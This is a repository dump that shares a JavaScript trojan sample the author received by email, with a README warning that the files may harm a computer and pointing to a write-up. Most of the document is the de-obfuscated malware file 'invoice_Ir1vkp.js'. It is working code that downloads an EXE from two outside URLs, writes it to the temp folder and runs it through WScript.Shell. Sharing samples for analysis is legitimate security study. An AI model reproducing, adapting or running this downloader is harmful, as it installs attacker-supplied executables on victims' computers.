├── README.md ├── invoice_Ir1vkp.js └── orig ├── WU4638533711.zip ├── WU6533175781.zip └── file.zip /README.md: -------------------------------------------------------------------------------- 1 | These files may harm your computer. Don't run them unless you know what you are doing. 2 | 3 | This repo contains a encoded Javascript trojan I once received per e-mail. The script tries to download and run an EXE. I cleaned it up a little to show what it does. 4 | 5 | See http://www.sjoerdlangkemper.nl/2016/02/18/polymorphic-javascript-malware/ for the explanation. 6 | -------------------------------------------------------------------------------- /invoice_Ir1vkp.js: -------------------------------------------------------------------------------- 1 | var decode = function (packedText) { 2 | var cipher ="FRICVuNtlR4PYdTM"; 3 | 4 | var Base64 = { 5 | _keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", 6 | 7 | decode: function (input) { 8 | var output = ""; 9 | var chr1, chr2, chr3; 10 | var enc1, enc2, enc3, enc4; 11 | var i = 0; 12 | 13 | input = input.replace(/[^A-Za-z0-9\+\/\=]/g, ""); 14 | 15 | while (i < input.length) { 16 | 17 | enc1 = this._keyStr.indexOf(input.charAt(i++)); 18 | enc2 = this._keyStr.indexOf(input.charAt(i++)); 19 | enc3 = this._keyStr.indexOf(input.charAt(i++)); 20 | enc4 = this._keyStr.indexOf(input.charAt(i++)); 21 | 22 | chr1 = (enc1 << 2) | (enc2 >> 4); 23 | chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); 24 | chr3 = ((enc3 & 3) << 6) | enc4; 25 | 26 | output = output + String.fromCharCode(chr1); 27 | 28 | if (enc3 != 64) { 29 | output = output + String.fromCharCode(chr2); 30 | } 31 | if (enc4 != 64) { 32 | output = output + String.fromCharCode(chr3); 33 | } 34 | 35 | } 36 | 37 | output = Base64._utf8_decode(output); 38 | 39 | return output; 40 | 41 | }, 42 | _utf8_decode: function (utftext) { 43 | var string = ""; 44 | var i = 0; 45 | var c = c1 = c2 = 0; 46 | 47 | while (i < utftext.length) { 48 | 49 | c = utftext.charCodeAt(i); 50 | 51 | if (c < 128) { 52 | string += String.fromCharCode(c); 53 | i++; 54 | } 55 | else if ((c > 191) && (c < 224)) { 56 | c2 = utftext.charCodeAt(i + 1); 57 | string += String.fromCharCode(((c & 31) << 6) | (c2 & 63)); 58 | i += 2; 59 | } 60 | else { 61 | c2 = utftext.charCodeAt(i + 1); 62 | c3 = utftext.charCodeAt(i + 2); 63 | string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63)); 64 | i += 3; 65 | } 66 | 67 | } 68 | return string; 69 | } 70 | }; 71 | 72 | var text = Base64.decode(packedText); 73 | 74 | var cipherLength = cipher.length; 75 | var result = ""; 76 | for (var i = 0; i < text.length; i++) { 77 | result += String.fromCharCode(text.charCodeAt(i) ^ cipher.charCodeAt(i % cipherLength)); 78 | } 79 | return result; 80 | }; 81 | (function() { 82 | var statusOk = 200; 83 | var get = "GET"; 84 | var exec = "Exec"; 85 | var wscriptShell = "WScript.Shell"; 86 | var xmlHttp = "MSXML2.XMLHTTP"; 87 | var adodb = "ADODB"; 88 | var stream = "Stream"; 89 | var temp = "%TEMP%\\"; 90 | var exe = ".exe"; 91 | var minSize = 2e5; 92 | var urls = [ "http://helloworldqqq.com/26.exe", "http://wtfisgoinghereff.com/26.exe" ]; 93 | var filename = 524288; 94 | var shellObject = WScript.CreateObject(wscriptShell); 95 | var httpObject = WScript.CreateObject(xmlHttp); 96 | var streamObject = WScript.CreateObject(adodb + "." + stream); 97 | var tempDir = shellObject.ExpandEnvironmentStrings(temp); 98 | var exePath = tempDir + filename + exe; 99 | var success = false; 100 | for (var i = 0; i < urls.length; i++) { 101 | try { 102 | var url = urls[i]; 103 | httpObject.open(get, url, false); 104 | httpObject.send(); 105 | if (httpObject.status == statusOk) { 106 | try { 107 | streamObject.open(); 108 | streamObject.type = 1; 109 | streamObject.write(httpObject.responseBody); 110 | if (streamObject.size > minSize) { 111 | i = urls.length; 112 | streamObject.position = 0; 113 | streamObject.saveToFile(exePath, 2); 114 | success = true; 115 | } 116 | } finally { 117 | streamObject.close(); 118 | } 119 | } 120 | } catch (ignored) {} 121 | } 122 | if (success) { 123 | shellObject[exec](tempDir + Math.pow(2, 19)); 124 | } 125 | })(); -------------------------------------------------------------------------------- /orig/WU4638533711.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/WU4638533711.zip -------------------------------------------------------------------------------- /orig/WU6533175781.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/WU6533175781.zip -------------------------------------------------------------------------------- /orig/file.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Sjord/encoded-js-trojan/f0b933601bb09f4b435a9c449d6e9eea1eac0c60/orig/file.zip --------------------------------------------------------------------------------